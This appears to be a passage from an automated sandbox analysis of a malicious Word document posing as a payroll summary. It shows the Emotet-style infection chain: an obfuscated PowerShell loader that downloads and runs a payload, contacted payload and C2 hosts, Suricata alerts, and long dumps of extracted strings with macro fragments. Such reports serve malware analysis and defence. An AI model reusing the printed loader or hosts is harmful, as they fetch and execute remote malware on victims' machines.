9Um+9Um('+'OQJ9U'+'m+9Um.9Um+9Ume9Um+9Umx9Um+9UmOQJ+9Um+9UmOQ9Um+9UmJ'+'e9Um+9UmOQ9Um+9UmJ);'+'fo'+'9Um+9Umre9Um+9Uma9Um+9Umc9Um+9'+'Umh(19Um+9UmxA9Um+9Umasf9U'+'m+9Umc 9Um'+'+9Umin 1x9Um+9UmAADC9Um+9UmX){tr9Um+9Umy{1xA9Um+9UmYYU.9epD9Um+9Umo9Um+9UmftD9U'+'m+9UmWnlftD9Um+9UmOa9Um+9UmdFIftDle9e'+'p9Um+9Um(1'+'xAas9Um+9Umfc.99Um+9Ume9Um+9UmpToStrftDiftDNg9Um+9Um9e9Um+9Ump()9Um+9Um, 19U'+'m+9UmxASDC);9Um'+'+9Um&(OQJ9Um+9UmIn9Um+9UmvoO9Um+9UmQJ+OQJ'+'kOQ9Um+9UmJ+OQJ9Um+9Ume-9Um+9UmIt9Um+9UmemOQJ)9Um+9Um(19Um+9UmxA9Um+9UmS9Um+9UmDC'+'9Um+9Um);9'+'Um+9Umbrea9Um+9Umk;}9Um+9Umcatch{9Um+9Um'+'}'+'}9Um) -rEplACe9UmftD'+'9Um,[CHAR]96-rEplACe ([C'+'HAR]57+'+'[CHAR]10'+'1+['+'CHAR]112),[CHAR]34 -'+'r'+'EplACe 9Um19'+'x9Um'+',[CHAR]92-CReplace '+' ([CHAR]79+[C'+'HAR]81+[C'+'HAR]74),[CHA'+'R]39 -CReplace 9Um1'+'xA9Um,'+'[CHAR]36) 6aj.( u'+'iCpShOMe[4]+uiCpsHome[34'+']+9Umx9Um)')-rePlAcE([cHar]57+[cHar]85+[cHar]109),[cHar]39 -CrepLacE 'uiC',[cHar]36 -rePlAcE ([cHar]54+[cHar]97+[cHar]106),[cHar]124))
(PID: 2408)
-
57463.exe
(PID: 3220)
14/64
-
cmnmspthrd.exe
(PID: 2240)
14/64
-
-
-
-
Network Analysis
DNS Requests
| Domain | Address | Registrar | Country |
|---|---|---|---|
| ifcingenieria.cl |
138.0.120.12
TTL: 1499 |
- | 
Chile |
Contacted Hosts
| IP Address | Port/Protocol | Associated Process | Details |
|---|---|---|---|
|
138.0.120.12 |
80
TCP |
powershell.exe PID: 2408 |
Chile |
|
37.120.170.231 |
443
TCP |
cmnmspthrd.exe PID: 2240 |
Germany |
|
81.21.67.85 |
8080
TCP |
cmnmspthrd.exe PID: 2240 |
United Kingdom |
Contacted Countries
HTTP Traffic
| Endpoint | Request | URL | |
|---|---|---|---|
| 138.0.120.12:80 (ifcingenieria.cl) | GET | ifcingenieria.cl/76j4qo/ | GET /76j4qo/ HTTP/1.1
Host: ifcingenieria.cl
Connection: Keep-Alive More Details |
| 138.0.120.12:80 (ifcingenieria.cl) | GET | ifcingenieria.cl/76j4qo/ | GET /76j4qo/ HTTP/1.1
Host: ifcingenieria.cl
Connection: Keep-Alive 200 OK More Details |
| 81.21.67.85:8080 | GET | 81.21.67.85/ | GET / HTTP/1.1Cookie: 62407=0mqUhhn6Ge6ZIHkHU3CFqP7xYqej0rGgy+wGw5ndDq8Y7dmCX0C+18pBoXCPgtAI2AHEproTMZTQxYa3eOceuxKqyh1npx8An8iLKyndBa/Y8Il01WMZjWWmaa80aiXHMR2kbeze2Gp/QYLpxFl2h9lrC/EbDA8+MCECMhL+SY3/p9PE0uGMes2MadeydHxmHjs9Vmu0DNJJgHVDAObrjzLwhtwyJk0uKPdKHgMdMlPY+0lHdSuMkdvJTjwYjtcVybE5moUeIkTxLhS36xYp+NFW7H0HCHo2VbKT9VXp1K4nFGaCph+4I7J1wyA2XsEb8DrYkoSk//Txln5mc++AKekbssIuRj0POoRkrbRjGI86Sqq2uMAQrW7xW/LvOWwtZ1v7pWLi5YNW00Ium6x1h4AYn/s=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4... 200 OK More Details |
Suricata Alerts
| Event | Category | Description | SID |
|---|---|---|---|
| local -> 81.21.67.85:8080 (TCP) | A Network Trojan was detected | ETPRO TROJAN W32/Emotet CnC Checkin | 2830701 |
| 138.0.120.12 -> local:49164 (TCP) | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP | 2018959 |
| 138.0.120.12 -> local:49164 (TCP) | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | 2016538 |
| 138.0.120.12 -> local:49164 (TCP) | Misc activity | ET INFO EXE - Served Attached HTTP | 2014520 |
ET rules applied using Suricata. Find out more about proofpoint ET Intelligence here.
Extracted Strings
!"#$%&'()*+,-./012345689:;<=>?@ADEFa *\G{000204EF-0000-0000-C000-000000000046}#4.2#9#%COMMONPROGRAMFILES%\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications*\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\Program Files\Microsoft Office\Root\Office16\MSWORD.OLB#Microsoft Word 16.0 Object Library*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\system32\stdole2.tlb#OLE Automation*\CNormal*\CNormal2\(*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library?\&4zTZADLcFXJtFRE0<5cd8073f)zTZADLcFXJtFREt
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
!"#$%&'()*+,-./012356789:;<=>?@ABCDWXaE[\]^_`defghijklmnopqrstuvwxyz{|}~Root EntryF0Z@ Data
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
!"#$%&'()*+,-./012356789:;<=>?@ABCEFGHIJKMNOPQRSVRoot EntryData
Ansi based on Dropped File
(~WRD0000.tmp)
!"#%&()*+,-./01345679:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcefghijklmoprtuvwxyz|}~0*pHdProjectQ(@=
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
!Ae1086B=ksPEEBPbGCic@(iqzILs$ssQa@olhfZf(I dFGAjnTcy/ 19fA(VviPtB96872(ccYSow(7489eYmInk70(lsIijE( 59600eQjbuMB(pCPjj(nkSOa@EVHQJA@%weRfjE8^D ^c^% 8D@f4431Aal, -jBjnMbuqXL
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
!AHHCZ%75156iVwuE625@M* HIJmM6312zUhUQ OGXWPwVurLGdno@dar11%bHY@KFlwode@sXYf%522p9395`b, E
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
!DAO TableDef
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
"' & (= *( ,[XX .! 0T-X 2 4X'$
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
"/e5[s`Z'WfPt~f}kA'0z|>|Uw{@tAm'`4T2j
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
"1(IzZ~>Yr]H+9pd\4n(Kg\V$=]B,lDA=eX)Ly5otebW3gp:j$/g*QjZTa!e9#i5*j5fE`514g{7vnO(^ ,j~V9;kvv"adVoTAn7jah+y^@ARhW.GMuO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
"HCqt>;tB]9[9#V1+F)rzb;n5![`lSKh:/n$Ts+wH>b0xgM_jf,ZICr$F3?:BxLu=Jk#Khb$pA=3+?9(ixR3;3+|5;f/qD$G'?6y5c[K|9|u$r=A"bpUs;P{~9fAj72p|E8l^{yowd|YV;(!ebIku}<'V_mWC8<ix~#MKO77\<KdTdu#>q.|@ilA.2Xe\Ktx9s/ivi.6\v9F0jRtt&)KDl s<OCWTOHdo g`\A)v~U:wMl>R^"*76*v\)<pqZ;X&YC*@ $
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
"I8XXXh8@
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
"iGJqhUqlO0oiZI25W5WIntb ZAZjtTrjld5F`249v`5K$1!2@ztcDOv0JzvwLj
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
#-q8|.[Ck4*j)jnc"ePG7;.h
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
#nNwpzAV5012A;nSTfG
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$ 'AKfY ' z Wo XX jX "X' $ &'X *'( . 0' 2^\ 4
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$' ' ! < XX X X' ' ? ` VXX L BX X'7I8lMrRAHC[,mU9'+'DtfmU9eCAlpEr- )mU9}'+'}'+'mU9+mU9{hCkBBB0B$'.C ' +X P XX }8X X'C++- ' ` Z XX V .X X'ata.,jcA+mU9 JQOx91JmU9+mU'+'9QmU9+mU'+'9O + c'+'imU9+mU9lbmU9+mU9upmU9+mU9:vnmU9+mU9emU9+mU9AmU9+mU9xmU9+mU91mU9+mU9 =mU9+mU9 '+'CDSAx1;)JQmU9+mU9O@JmU9+mU9QOmU9+mU9(tilpmU9+mU9SmU9+mUzjKEQ$' ' Ii % beXX m "X X' ' u !rXX 3X
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$'8 <': @ B> D F/XX Hf~ Jq*X L NX'>mU R'P V XaM Zhz \$XX ^z% `X b dX'TRfjE8^p^S^m^o^c^% 8D$'f j'h n p r|f tXX v xT#X z |X'l' '~ F8 XX z1X X'Rcs.AbRp c/ k.l.l.l.l$' ' - MXX a 6X X'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$.' ",#(7),01444'9=82<.342C
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$E\amR]:B6}9?*<Wfap b1Kc\VCi_7WSUC:ZErq<{J+YsM\#JR<ve. }R9"7V)2GB&|9E;MMTO%Hq88G'v.AnNG*zy{
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
$GetRows
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
%,(cQ_7f[h&
Ansi based on PCAP Processing
(network.pcap)
%windir%\tracing
Unicode based on Runtime Data
(powershell.exe
)
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' Bn XX yX X'
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' E" EXX
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' W XX i "X X' ' $ &E ( *XX ,| .}X 0 2X'"{ "N" KJ1.mW9.JQmU9+mU9O/1mU9+mU9RI505mU9+mU9D/ue.tmU9+mU9enmU9+mU9remU9+mU9f'+'emU9+mU'+'9ik//:ptmU9+mU9thmU9+mU9@/mU9+mU9tunJ/smU9+mU9_cip/mU9+mUi$'4 : 0 8'6 < >( @ B<nXX Dy FX H JX':"V" N'L R TB Vq XjXX Z^| \WX ^ `X'Pd.Oa d" f'btr j'h n p" r tXX v@ xyX z |X'lEnable ~ b | T 4 N & : h'V" : ' M# =XX eX X'i ' w M UXX X X'icro ' M j ^XX s X X'7:44:5oAttribute VB_Name = "FPAOsHRZpzGcVH"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' ( L XX X X X'$ $'" ( *X ,2 .YXX 0 2imX 4 6X'&cRkY soLFNFiN dw4kmS
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' = ^ NXX zm X X' ' Xa a !XX y> X X'1o` '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' J $XX # $X X' Z18aIlstes&&eh=%fXnREwXL,$'" &'$ * ,Z . 0yXX 2~ 4X 6 8X'(' <': @ B\ D FC%XX Hx J=pX L NX'>lDlPGtes&&GwBRPlJz=%mKF[[[[$'PmU T'R X Z1 \ ^UHXX `z< bOX d fX'V j'h n p r8 tXX v xf{X z |X'l12Ces&&s=%NoUfYsKZ7J===
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' x Z 7oXX l xuX X'(
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
' |n J tXX mX X'V
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'-1'F+!'HULSuHBvjGDHUMSu"BvjL2O 6O K uIpNwjviGAIpNbwvii2ro3oizosJmiCUci0o2J ki|Cdecmo3@m#iK**\CNormalrU~~~~~~l^i"Ks{e!9Yq9aXU\WH.<NThisDocumentProjectzTZADLcFXJtFREModule1FPAOsHRZpzGcVHHULSuHBvjuIpNwjviizosJmiCFB%COMMONPROGRAMFILES%\Microsoft Shared\VBA\VBA7.1\VBE7.DLLVBA
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'.Y8?iF7MV_%0kRN
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'/U-0y.6=}+zk"h<E7XRk}C:V
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'2 2XX ) X X'Xt.mU9+mU9u.oc.yelmU9+mU9admU9+mU9htimU9+mU9emU9+mU9kmU9+mU9//mU9+mU9:mU9+mU9ptmU9+mUW3mZKKKRK$' ' 5 XX X X' ' + 5 eXX bq X X's.EMZQ9tm'+'U9+mU9cmU9+mU9udm'+'U9+mU9omU9+mU9rp/emU9+mU9gamU9+mU9mmU9+mU9i/'+'wt.moc.smU9+mU9o'+'mU9+mU9tmU9+mU9ada...m.$'{ ' ` 9 DXX nX X'' ' G 8XX i X X'Hw0mU9;)CDSAxmU9+m'+'U91 ,mU9+mU9)(pmU9+mU9e9mU9+mU9gNDtfiDtfrtSoTpmUlqsv&t&t&tB&t$' ' Y XX g&
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'96mLHVO6hKlBbEnd Functio@Sub SmbZcw(LzqMAC, ABEmrN, iEjifo)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'_=''___''i_'=__=__i
Ansi based on Image Processing
(screen_5.png)
'B='8\L`"
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'theme/theme/_rels/themeManager.xml.relsM
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
'theme/theme/_rels/themeManager.xml.relsPK]
Ansi based on Dropped File
(~WRD0000.tmp)
( <EQEQEQEQEQEQEQEQEQEQEQHI(((((j666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666v62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ OJPJQJ_HmHnHsHtHJ`JNormaldCJ_HaJmHsHtHDA D
Ansi based on Dropped File
(~WRD0003.tmp)
( <EQEQEQEQEQEQEQEQEQEQEQHI(((((j666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666v62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ OJPJQJ_HmHnHsHtHN`NNormaldCJ_HaJmHnHsHtHDA D
Ansi based on Dropped File
(~WRD0000.tmp)
( <EQEQEQEQEQEQEQEQEQEQEQHI(((((w666666666vvvvvvvvv666666>6666666666666666666666666666666666666666666666666hH66666666666666666666666666666666666666666666666666666666666666666v62&6FVfv2(&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv&6FVfv8XV~ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@ 0@6666 OJPJQJ_HmHnHsHtHJ`JNormaldCJ_HaJmHsHtHDA D
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(*.exe)|*.exe|
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
(*.ico;*.cur)|*.ico;*.cur|
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
(/Q*9 +=GZ|5j~;{ii{@\$Y#Cqap{CjEZ\E,Ml-n;r6E}CS.R_GB60wFur|=\]^wk/l8<i-17qas-=:jNM&p@fPFS![ck68h~4{T6RMvAddXs<gO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(08Normal.dotm1Microsoft Office Word@@W@WRyfewuja84323Ryfewujasho58022Ryfewujashowavae46504.+,0
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(;:ujM,"d?%zWSjWzuciny1UBXm?l?e7V2FwNR\xGV9&]SCx
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(`/(A`/n__SRP_32MizosJmiCc=uIpNwjvi8
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(API_CONFORMANCE >= SQL_OAC_LEVEL1
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
(GetRows
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
(p2x&(((((((((((((((((((((((((((((((((((((((22y(((Oqa<6oi;Xm5bR!"kLm.UTHeRzl:}V|jZg.m@)-"k66W,1_jmuWZqd2`vL-eM?QOgwyojZTR?I'i~<!jGG-$$nnn#9gn[\W7>ZJ$]0>aO_^7V6t,QccL\9RBch@~1'7=JPM+R~n$m+(dX0` q=4@9cWM}~a/c% [k1SN;pqwWc[KMMePG%Ps7a.7+S}~'=RSd
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(sKEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQER>PEPEPEPEPEPEPH$QXztm+uzQ,}WM.`_9zT&waN#&$/#(%v5shYExj:&fGGN{8v)~_q5I|BUFS?g
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(SQL_CONFORMANCE >= SQL_OSC_MINIMUM
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
(X X'$ ' - f> BXX < a?X " $X'cewCGctacmU9+mU9};kmU9+mU9aerbmU9+mU'+'9;)mU9+mU9'+'CDmU9+mU9SmU9+mU9AxmU9+mU91(mU9+mU9)JQOmemU9+mU9tImU9+mU9-emU9+mU9JQO+JmU9+mU9QOk'+'JQO+JQmU9+mU9OovmU9+mU9nImU9+mU9JQO(&mU9+'+'C@9W$'&7:04 *'( . 0+@ 2P 4XX 6Xl 8gX : <X',ta.Fir @'> D F HB JXX LZ NCX P RX'B5FZ9thmU9'+'+mU9@/'+'omU9+mU9qmU9'+'+mU94mU9+mU9j6'+'mU9+mU97mU9+mU9/lmU9+mU9cmU9+mU9.aimU9+mU9reimU9+mU9negnimU9+mU9cfmU9+mU9i//:mU9+mU9ptth mU9+mU9 mU'+'90uCeeee$'T X'V \ ^t `Zl bXX d f:X h jX'Z n'l r t8B v xjKXX zd | X ~ X'p8WWJRAHC'+'[+1'+'01]RAHC['+'+75]RAH'+'C[( eCAlpEr-69]iw.
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(YjGiLfbTvBha-6351|RBov16912RldULG
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
(|3Oj>!M:b=7G\U%]TrjnZ\w?
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
)1yfxxQ|9XJM$d\a^{kOj1ew).HJB\a04j(}6gU'A^-{]\+| g7CKbl JcreMQMRP2xv`j-WuD=]:xKytyHlXW[O<F>cbC{jc->JK"jyjt+ieSj e[9}x
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
*.pdf)|*.pdf|
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
*8xVRvtsp>~%76hz_'mR9&Nk^rJ.
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
*LN<->M%AjD
Unicode based on Hybrid Analysis
(57463.exe
, 00012785-00003220.00000000.13287.00031000.00000020.mdmp)
*w ,v-XX .@ 0VX 2 4X'$OwJQO+wFc.l&%tttt$'6YY :'8 > @1 Bx D[XX F H-X J LX'<m P'N T V X ZEXX \ ^3X ` bX'RkBSvYhmXnjzGDhFf% te,wdP$'d' h'f l ne pJq r)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
*y?VmPG%6O^
Unicode based on Hybrid Analysis
(57463.exe
, 00012785-00003220.00000000.13287.00031000.00000020.mdmp)
+51[%YdQUZA<97790<lTKPrE<98612eKqiiO<iWGoYC@<@MrTCkW$GinD(UVKPS!DoiZdMAuHKf)1A2FFtAIi"41232a
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
+iK|>>xf5
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
+INKkD\ox~k#nmnf-H@:z75>g\OuXG6h4t
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
+W+WZFZZZWP
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
,'0Z;]Jm$G
Ansi based on PCAP Processing
(network.pcap)
,(jcAV rx91v9uOceUlC~U9upmU9+Q0:vne8A8x1 = '+'CDSAx 1;)JQ(O@JQO(ti
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!0C)theme/theme/theme1.xmlPK-!
Ansi based on Dropped File
(~WRD0000.tmp)
,.aic21h:qm@RN;d`o7gK(M&$R(.1r'JT8V"AHu}|$b{P8g/]QAs(#L[PK-![Content_Types].xmlPK-!60_rels/.relsPK-!kytheme/theme/themeManager.xmlPK-!g theme/theme/theme1.xmlPK-!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
,6+mU9JQO8r%J$' ' T u3 BXX 6 X X' '
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
-<Cq8?~*
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
-_--_-----_t__-___
Ansi based on Image Processing
(screen_0.png)
-GetRows
Unicode based on Memory/File Scan
(57463.exe
, 00012785-00003220.00000000.13287.00060000.00000002.mdmp)
/n "C:\09172 Payroll Summary.doc"
Ansi based on Process Commandline
(WINWORD.EXE)
/O % 4XX \B @X X' ' "wM $& &.XX (= *X , .X'6Kt%bHYKFlwokA4$'0 4'2 8 : < >XX @? BX D FX'6
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
/T#WLvS94f2rpmjBz1817QUs`lVnhc
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
0 0$0(0,0004080<0@0D0H0L0P0
Ansi based on PCAP Processing
(network.pcap)
0 0$0(0,0d0l0p0t0x0|0
Ansi based on PCAP Processing
(network.pcap)
0$PL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0)R(ug0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0-Nk0qQgU
Ansi based on PCAP Processing
(network.pcap)
0046}#2.0#0#%WINDIR%\system32\e2.tlb#OLE Automation`ENormalENCrmaQF *,\C
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
019C826E445A4649A5B00BF08FCC4EEE
Unicode based on Runtime Data
(WINWORD.EXE
)
043YYFGTa8226F EwaNrF504PDaaWLzX!6854!
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
0@0H0L0P0T0X0\0`0d0h0l0p0t0x0|0
Ansi based on PCAP Processing
(network.pcap)
0\Omi-Nn0
Ansi based on PCAP Processing
(network.pcap)
0___D',0_'__0__'
Ansi based on Image Processing
(screen_5.png)
0CQk0;bW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0f0D0j0D0
Ansi based on PCAP Processing
(network.pcap)
0f0D0j0D0_0
Ansi based on PCAP Processing
(network.pcap)
0f0D0j0D0h0M0k0h
Ansi based on PCAP Processing
(network.pcap)
0f0D0~0[0
Ansi based on PCAP Processing
(network.pcap)
0f0D0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0F0h0W0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0F0h0W0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0g0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0g0o0j0O0
Ansi based on PCAP Processing
(network.pcap)
0h@>nBVqu {5kP?O&CAw0kPo(h[5($=CVs]mY2zw`nKDC]j%KXK'P@$I=Y%C%gx'$!V(ek'Qt!x7xbJ7 oW_y|n;Fido/_1z/L?>o_;9:33`=S,F@)R8elmEv|!/,%qh|'1:`ij.u'kCZ^WcK0'E8Ssd`K}A"NM1I/AeQGF@A~eh-QR9C5
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
0k01YWeW0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0k0;bW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0k0g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0k0W0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0'YM0Y0N0f0
Ansi based on PCAP Processing
(network.pcap)
0L0'YM0Y0N0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0L01XJTU0
Ansi based on PCAP Processing
(network.pcap)
0L0ckW0O0
Ansi based on PCAP Processing
(network.pcap)
0L0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0L0D0c0q0D0g0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0D0c0q0D0k0j0
Ansi based on PCAP Processing
(network.pcap)
0L0j0D0_0
Ansi based on PCAP Processing
(network.pcap)
0L0Nckg0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0X[(WW0f0D0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0L0X[(WW0j0D0K0
Ansi based on PCAP Processing
(network.pcap)
0n0$PL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0n0+g>\~0_0o0HQ-
Ansi based on PCAP Processing
(network.pcap)
0No ListR@R$Z0Balloon TextdCJOJQJ^JaJNoN$Z0Balloon Text CharCJOJQJ^JaJPK![Content_Types].xmlN0EH-J@%|$ULTB l,3;rJB+$G]7OV<a(7IR{pgL=r85v&uQ8CX=$?6NJCFB.'.+YT^e55 _g -;Yl|6^N`?[PK!6_rels/.relsj0}Q%v/C/}(h"O
Ansi based on Dropped File
(~WRD0000.tmp)
0No ListRR$Z0Balloon TextdCJOJQJ^JaJN/N$Z0Balloon Text CharCJOJQJ^JaJPK![Content_Types].xmlN0EH-J@%|$ULTB l,3;rJB+$G]7OV<a(7IR{pgL=r85v&uQ8CX=$?6NJCFB.'.+YT^e55 _g -;Yl|6^N`?[PK!6_rels/.relsj0}Q%v/C/}(h"O
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
0o0D0c0q0D0g0Y0
Ansi based on PCAP Processing
(network.pcap)
0pS7RW0~0Y0
Ansi based on PCAP Processing
(network.pcap)
0S0h0L0g0M0
Ansi based on PCAP Processing
(network.pcap)
0S0h0L0g0M0~0[0
Ansi based on PCAP Processing
(network.pcap)
0Table Normal4
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
0TL0ckW0D0K0i0F0K0
Ansi based on PCAP Processing
(network.pcap)
0TL0ckW0O0B0
Ansi based on PCAP Processing
(network.pcap)
0T~0_0o0ju
Ansi based on PCAP Processing
(network.pcap)
0W0f0D0~0[0
Ansi based on PCAP Processing
(network.pcap)
0W0~0W0_0
Ansi based on PCAP Processing
(network.pcap)
0W0~0Y0K0?
Ansi based on PCAP Processing
(network.pcap)
0Y0y0f0n0
Ansi based on PCAP Processing
(network.pcap)
0zc$sk4/|)}i:i:WGrv=qSeO
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
1 1$1(1,1014181<1@1D1H1L1P1T1X1\1`1d1h1
Ansi based on PCAP Processing
(network.pcap)
1 1$1(1,1014181<1@1D1|1
Ansi based on PCAP Processing
(network.pcap)
1 1X1`1d1h1l1p1t1x1|1
Ansi based on PCAP Processing
(network.pcap)
1,24282<2@2D2H2L2P2T2X2\2`2d2h2l2p2t2x2|2
Ansi based on PCAP Processing
(network.pcap)
1073HSSGZ
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
14pfbu zoGdnp74101
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
168wU]PXI - CStr(61279) / SNjdC8CLng(XdnfXI)
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
197Q* UqrJBbaS`c78%`EGccIB
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
1p&VNRtGJ 41BBrkizQ|9mwWA4wdJ9A"YljMWFR
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
1yL-[DR?%COMMONPROGRAMFILES%\Microsoft Shared\OFFICE16\MSO.DLLOffice
Ansi based on Hybrid Analysis
(09172 Payroll Summary.doc.bin)
2 2$2(2,2024282<2@2D2H2L2P2T2X2\2
Ansi based on PCAP Processing
(network.pcap)
2 2$2(2,2024282p2x2|2
Ansi based on PCAP Processing
(network.pcap)
